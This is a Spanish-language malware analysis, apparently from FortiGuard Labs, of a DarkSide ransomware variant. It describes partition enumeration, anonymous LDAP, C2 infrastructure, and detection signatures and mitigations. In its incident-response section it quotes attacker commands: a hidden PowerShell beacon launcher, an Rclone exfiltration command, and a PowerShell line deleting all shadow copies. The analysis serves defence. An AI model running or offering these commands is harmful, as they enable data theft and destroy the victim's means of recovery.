Plataformas afectadas:
Nivel de riesgo de Windows : ALTO / MEDIO. Esta variante de ransomware, escrita por los mismos delincuentes que atacaron Colonial Pipeline, exhibe la capacidad de detectar y comprometer discos duros particionados, un comportamiento nunca antes visto.
Impacto: MEDIO. Actualmente, este ataque parece estar limitado a organizaciones específicas y no es el resultado de una actividad similar a un gusano generalizada.
Introducción
FortiGuard Labs ha descubierto tácticas adicionales utilizadas por los actores de amenazas que atacaron Colonial Pipeline . En esta variante diferente del ransomware DarkSide, los investigadores de FortiGuard Labs descubrieron la capacidad de buscar información de partición y comprometer múltiples particiones de disco.
En el momento del descubrimiento, los investigadores de FortiGuard Labs creían que el ransomware buscaba particiones para encontrar posibles particiones ocultas configuradas por administradores de sistemas para ocultar archivos de respaldo. Pero un análisis más detallado confirmó una técnica aún más avanzada. Esta variante de DarkSide busca particiones en un sistema de arranque múltiple para encontrar archivos adicionales para cifrar, lo que causa un mayor daño y un mayor incentivo para pagar un rescate para recuperar archivos.
En este blog el lector descubrirá:
- El código de ransomware DarkSide es eficiente y está bien construido, lo que indica que su organización de ciberdelincuentes incluye ingenieros de software experimentados.
- Esta variante de ransomware (NO la versión utilizada para interrumpir las operaciones de Colonial Pipeline) es de naturaleza avanzada y se observó que busca particiones en un entorno de arranque múltiple para crear más daño. También busca el controlador de dominio y se conecta a su directorio activo a través de la autenticación anónima LDAP.
- El equipo de respuesta a incidentes de FortiGuard descubrió información adicional sobre los archivos utilizados y asociados con DarkSide durante compromisos recientes.
- El uso de un host a prueba de balas bien conocido (para los investigadores de amenazas) que ha sido utilizado por una amplia variedad de actores maliciosos para numerosas actividades nefastas a lo largo de los años, incluido el ataque a las elecciones del DNC de 2016 en los Estados Unidos.
Análisis ampliado de una variante de DarkSide por FortiGuard Labs
FortiGuard Labs encontró técnicas novedosas en esta variante de la organización criminal cibernética DarkSide nunca antes vista en ransomware. Esta variante de DarkSide [1] se obtuvo a través de nuestra asociación con CTA.
Esta muestra de ransomware, no relacionada con la campaña Colonial Pipeline, se programó de manera eficiente con muy poco espacio desperdiciado, y la sobrecarga del compilador se ha mantenido al mínimo, lo cual es inusual para la mayoría de los programas maliciosos. Si bien el tamaño del archivo es relativamente pequeño para el malware (57.856 bytes), puede ofrecer una carga útil mucho mayor de lo esperado. La siguiente sección analizará más de cerca dos de las funciones más exclusivas que lleva a cabo esta variante de DarkSide. Uno se ocupa de Active Directory y el otro se ocupa de las particiones.
Los actores malintencionados saben que Active Directory es básicamente una mina de oro de información de red. En esta campaña, el grupo DarkSide incluyó un ataque de Active Directory en su software de ransomware. Para lograr esto, primero intenta buscar controladores de dominio.
Figura 1: búsqueda de controladores de dominio
Si se encuentran controladores de dominio, los utilizará para intentar conectarse a Active Directory. Sin embargo, debido a que generalmente se requieren permisos para hacer esto, esta variante de DarkSide intenta usar LDAP para autenticarse de forma anónima. Tenga en cuenta el uso de una contraseña nula y un nombre de usuario nulo en la siguiente secuencia:
Figura 2: Autenticación anónima LDAP
Esta variante de DarkSide puede usar COM para interactuar con el propio Active Directory. Si tiene éxito, el malware intenta eliminar ciertas variables, como defaultNamingContext y dnsHostName .
Después de emitir consultas de Active Directory, el ransomware intenta cifrar archivos en recursos compartidos de red que se encuentran en esta sección del código. Tenga en cuenta que DarkSide hace hincapié en evitar los recursos compartidos denominados C $ y ADMIN $, y también comprueba primero si un recurso compartido se puede escribir antes de intentar cifrar los archivos en él. C $ y ADMIN $ son recursos compartidos de administrador predeterminados y conocidos, a los que se supone que solo pueden acceder los miembros del grupo Administradores o el grupo Operadores de respaldo si no se han desactivado o reconfigurado. Parece probable que DarkSide evite estos recursos compartidos ante la posibilidad de que no se esté ejecutando en el contexto de un administrador y los intentos de acceder a ellos podrían activar una alerta.
Se encontró una operación más singular en otro lugar. De manera similar al ransomware Petya (también conocido como NotPetya), DarkSide también escanea el disco duro para realizar acciones adicionales. En el caso de Petya, el MBR (Master Boot Record) estaba infectado, de modo que cuando un usuario encendía la computadora, iniciaba una nota de rescate directamente desde el MBR y esencialmente inutilizaba la computadora. (Para obtener más información sobre cómo se hizo esto, consulte nuestro blog de Petya aquí .) En el caso de la variante DarkSide, sin embargo, escanea la unidad para ver si es un sistema de arranque múltiple para encontrar volúmenes / particiones adicionales para intente cifrar sus archivos también. (NOTA: Aunque las definiciones técnicas de partición y volumen son diferentes, los dos se usarán indistintamente para los propósitos de este blog).
Figura 3: Volúmenes en bucle
Una vez que el malware encuentra un tipo de unidad de destino, verifica la versión de Windows en la que se está ejecutando. Para los sistemas que ejecutan Windows 7 y superior, el malware busca volúmenes con un archivo bootmgr. El archivo bootmgr se puede encontrar en la raíz de la unidad C: \ o se puede almacenar en otro volumen.
Figura 4: SO más nuevo
Para sistemas anteriores a Windows 7, DarkSide elige un enfoque diferente. Llama a la API DeviceIoControl utilizando el código de control IOCTL_DISK_GET_PARTITION_INFO_EX. (Por cierto, Petya también usó este código de control. Algunas de las similitudes entre los dos ataques son bastante interesantes). Según Microsoft, este código de control recupera información extendida sobre el tipo, tamaño y naturaleza de una partición de disco. Sin embargo, esta variante del ransomware DarkSide utiliza los resultados de una manera diferente.
Figura 5: particiones
Si el estilo de partición que encuentra es un MBR (Master Boot Record), seguirá adelante y verificará si esta partición es de arranque. Si no es así, intentará montar la partición. Esto parece ser un error de programación, ya que las particiones de arranque pueden contener bases de datos y otros datos relevantes. Quizás DarkSide solo busca cifrar archivos dentro de las particiones de datos en lugar de los que se encuentran en las particiones de arranque.
Figura 6: Posible error de MBR
Sin embargo, si el estilo de la partición es GPT (GUID [Globally Unique Identifier] Partition Table), DarkSide da otro paso. La primera entrada en el formato de una partición GUID es el tipo de partición y, como se esperaba, está definida por un GUID.
Definición de partición | GUID |
Sistema EFI | {C12A7328-F81F-11D2-BA4B-00A0C93EC93B} |
Entorno de recuperación de Windows | {DE94BBA4-06D1-4D40-A16A-BFD50179D6AC} |
Figura 7: Tipos de partición
Si alguno de estos GUID coincide con los resultados de la llamada a la API DeviceIoControl, DarkSide omite estas particiones y pasa a la siguiente. (A diferencia de Petya, parece que DarkSide al menos quiere dejar las máquinas infectadas en un estado semi-recuperable por razones obvias). En este punto (ya sea una partición de datos MBR o un volumen GPT no excluido), DarkSide sigue adelante e intenta para montar la partición usando la API SetVolumeMountPointW. Una vez que un volumen se monta correctamente, DarkSide intenta cifrar los archivos que contiene.
Por lo que hemos podido determinar, estas acciones son nuevas en la escena del ransomware. Como resultado, es posible que la comunidad global de seguridad cibernética no esté debidamente protegida contra esta estrategia de ataque.
Se observó el uso de archivos adicionales en una campaña alternativa de DarkSide
Si bien la muestra anterior provino de socios de confianza, el equipo de respuesta a incidentes de FortiGuard ha observado otras actividades relacionadas con los ciberdelincuentes de DarkSide. Los detalles obtenidos de estas observaciones arrojan luz adicional sobre las tácticas y técnicas utilizadas por los ciberdelincuentes de DarkSide. Por ejemplo, brindan más información sobre el uso de una baliza SMB, una baliza HTTPS, un componente de exfiltración que utiliza una herramienta de línea de comandos llamada Rclone, la actividad de WMI y la ejecución de malware.
Baliza SMB y HTTPS
Un análisis más detallado de una baliza SMB utilizada por DarkSide revela el código Cobalt Strike PowerShell. Aquí, la variable de entorno% COMSPEC% tiene el valor de «C: \ Windows \ System32 \ cmd.exe» y proporciona argumentos de línea de comandos, sin que el usuario lo sepa y para evadir la detección, que inician la aplicación PowerShell minimizada sin crear una nueva ventana. . El código de PowerShell codificado es la carga útil Cobalt Strike SMB Beacon:
% COMPSPEC% / b / c start / b / min powershell -nop -w hidden -encodedcommand <Carga útil de baliza SMB codificada>
El comando decodificado de PowerShell crea una canalización con nombre, «\\. \ Pipe \ UIA_PIPE_», en su comunicación de baliza SMB. La tubería es bidireccional; tanto los procesos del servidor como del cliente pueden leer y escribir en la tubería:
CreateNamedPipeA (\\. \ Pipe \ UIA_PIPE_xxxx, 3, 6, 1, 4b000, 4b000, 0, 0)
Otro hallazgo es el descubrimiento de una baliza HTTP. El siguiente comando de PowerShell ejecuta la carga útil HTTPS BEACON en hosts que se conectan de salida al servidor de comando y control (C2) del malware ubicado en IP (185.180.197 [.] 86). Lo hace usando el comando InternetConnectA (servidor: tailgatethenation.com, puerto: 443,).
% COMPSPEC% / b / c start / b / min powershell -nop -w hidden -encodedcommand <Carga útil de baliza HTTPS codificada>
Esta dirección IP C2, 185.180.197 [.] 86, estuvo muy activa en 2019 y se volvió a observar en 2021-04-19 después de una larga pausa. No sabemos por qué esta dirección IP permaneció inactiva durante más de un año.
Figura 11. Tráfico histórico de 2019 a 2021 para 185.180.197 [.] 86
Las entradas de DNS pasivas para C2 IP 185 [.] 180 [.] 197 [.] 86 se enumeran a continuación. Otros investigadores de amenazas han informado que DarkSide está utilizando esta IP, y esto da una idea de los tipos de datos para los que se utiliza. Como se puede ver, antes de su uso como servidor C2 para ransomware, se usaba principalmente para pornografía.
Figura 12. Entradas DNS pasivas históricas para 185.180.197 [.] 86
Examen adicional del DarkSide C2: IP
Tras un examen más detenido, se descubrió que la dirección IP 185 [.] 180 [.] 197 [.] 86 estaba ubicada en los Estados Unidos con KingServers BV KingServers ha sido clasificado como un host a prueba de balas por la comunidad infosec, y aunque en los Países Bajos, tiene vínculos con Rusia, donde se encuentra DarkSide.
El alojamiento a prueba de balas es un servicio proporcionado por algunas empresas de alojamiento que proporciona una indulgencia considerable en los tipos de material que cargan y distribuyen sus clientes, o en las actividades en las que pueden participar sin que los eliminen. KingServers es un sitio de alojamiento bien conocido por la comunidad de InfoSec y ha sido cubierto ampliamente por el periodista de seguridad Brian Krebs, entre otros. Específicamente, su servicio de alojamiento se utilizó en varios ataques notables, como los ataques a una empresa de subcontratación de TI con sede en India para perpetrar fraudes con tarjetas de regalo, así como para los ataques DNC de 2016 en los Estados Unidos.
La revisión de la telemetría observada durante un período de 30 días destaca una concentración de tráfico de máquinas con sede en EE. UU. Que se conectan al servidor DarkSide C2, con Estados Unidos en la parte superior (60%), seguido de los Países Bajos (9%), Singapur (8 %), Brasil (4%) y Gran Bretaña (4%). Esto corresponde a informes de que Darkside obtuvo al menos $ 60 millones en sus primeros siete meses, con $ 46 millones en los primeros tres meses de este año.
Figura 13. Tráfico a 185 [.] 180 [.] 197 [.] 86 durante 30 días
Figura 14. Tráfico del puerto 443 a 185.180.197 [.] 86 durante 30 días
Los atacantes del ransomware Darkside establecieron el comando y el control principalmente con un cliente RDP que se ejecuta en el puerto 443, enrutado a través de TOR. Las conexiones entre el puerto 443 y el servidor C2 185 [.] 180 [.] 197 [.] 86: 443 durante un período de 30 días revelan una concentración de tráfico de máquinas con sede en EE. UU., Con Estados Unidos a la cabeza (82%) , seguido de los Países Bajos (9%), con Gran Bretaña, Islandia y Filipinas / Suiza (empatados) completando los 5 primeros pings.
Exfiltración
Una tarea de Windows descubierta durante nuestro análisis muestra cómo se inició la exfiltración de datos. Se realizó utilizando Rclone, una herramienta de línea de comandos que se utiliza para sincronizar archivos y directorios entre un sistema local y el almacenamiento en la nube. En este caso, se cambió el nombre del binario Rclone para evadir la detección y se colocó en el directorio «C: \ Users \ Public \». El actor de amenazas buscaba exfiltrar archivos creados en el último año en los formatos de archivo .xls, .xlsx, .doc, .docx y .pdf.
Rclone copy <source> <dest> –max-age 1y –ignore-existing –drive-chunk-size 512M –buffer-size = 4G –transfers 20 –checkers 40 –include *. {Xls, xlsx, doc, docx, pdf }
Actividad de WMI
Para frustrar la recuperación de datos, la carga útil del ransomware intentó acceder al servicio Instrumental de administración de Windows (WMI).
Para agravar aún más el impacto del ataque, se descubrió el comando de PowerShell desofuscado:
“Get-WmiObject W32_Shadowcopy | Para cada objeto {$ _. Delete ();} ”
Usó el cmdlet Get-WmiObject de PowerShell para eliminar todas las instantáneas de volumen para frustrar la recuperación de datos.
Ejecución de malware
Se observó que PsExec, una herramienta de administración remota, ejecutaba la carga útil principal del malware (.exe). La carga útil del ransomware (.dll) se alojó en una carpeta compartida y se ejecutó un script por lotes para copiar la carga útil en el directorio C: \ Users \ Public del host. Esta carga útil se ejecutó utilizando rundll32 y se creó un servicio para mantener la persistencia. Había varias rutinas de cifrado dentro del proceso de trabajo, y las rutinas de cifrado se llamaban directamente para realizar el cifrado y crear artefactos de ransomware.
Conclusión
Este blog destaca que los actores de amenazas detrás de DarkSide no son su ransomware promedio como grupo de servicio. Debido a la sofisticación de sus ataques y código, también es poco probable que sea el cerebro de una sola persona. El nivel de detalle, esfuerzo, planificación y tiempo que el grupo ha dedicado, no solo a la creación del ransomware en sí, sino a tomarse el tiempo para anotar qué datos se robaron, la cantidad de datos, lo que contenían (así como la cantidad de datos en GB), y los que se han tomado por organizar y avergonzar a las víctimas destacan que este es el trabajo de una organización con recursos y tiempo considerables.
Para obtener información introductoria sobre DarkSide relacionada con el ataque Colonial Pipeline, consulte nuestro blog anterior y los informes de Threat Signal .
Protecciones Fortinet
Laboratorios FortiGuard
FortiGuard Labs cuenta con las siguientes firmas antivirus para DarkSide Ransomware y muestras de campañas asociadas disponibles públicamente como:
Posible Amenaza
Riskware / Agente
Riskware / PCH
Riskware / PowerTool
Riskware / RemoteUtilities
Riskware / TorTool
W32 / DarkSide.B! Tr.ransom
W32 / Filecoder.ODE! Tr.ransom
W32 / Filecoder_DarkSide.A! Tr
W32 / Filecoder_DarkSide.B! Tr
W32 / GenKryptik.FBOV! Tr
W32 / Packed.OBSIDIUM.BV! Tr
W64 / Kryptik.BVR! Tr
FortiGuard Labs cuenta con las siguientes firmas IPS para la actividad de baliza de impacto de cobalto como:
Puerta trasera.Cobalt.Strike.Beacon
Para la actividad TOR (darkweb), las firmas de control de aplicaciones de FortiGuard Labs detectan toda la actividad relacionada con TOR.
FortiEDR
Todos los IOC relacionados se han agregado a nuestra inteligencia en la nube y se bloquearán si se ejecutan en los sistemas del cliente.
FortiEDR detecta y bloquea la operación de acceso al servicio WMI citada anteriormente, de la siguiente manera:
FortiEDR también detecta y bloquea «Rundll32.exe», que se utiliza para ejecutar el proceso de trabajo de ransomware.
WebFiltering
Todas las IOC de red disponibles están bloqueadas por el cliente.
Otras mitigaciones
Debido a la facilidad de interrupción y al potencial de daño a las operaciones diarias, la reputación y la divulgación no deseada de información de identificación personal (PII), etc., es esencial mantener actualizadas todas las firmas de AV e IPS.
También es vital asegurarse de que todas las vulnerabilidades conocidas de los proveedores dentro de una organización se aborden y actualicen para proteger contra los atacantes que se establezcan dentro de una red.
Dado que la mayoría de los ataques de ransomware se originan con un usuario final comprometido, también se alienta a las organizaciones a realizar sesiones de capacitación continua para educar e informar al personal sobre los últimos ataques de phishing / spearphishing. También deben alentar a los empleados a que nunca abran archivos adjuntos de alguien que no conocen y que siempre traten los correos electrónicos de remitentes no reconocidos o no confiables con precaución. Esto se puede lograr mediante sesiones de capacitación periódicas y pruebas improvisadas utilizando plantillas predeterminadas por el departamento de seguridad interno de una organización. La capacitación simple de concienciación del usuario sobre cómo detectar correos electrónicos con adjuntos o enlaces maliciosos también podría ayudar a prevenir el acceso inicial a la red.
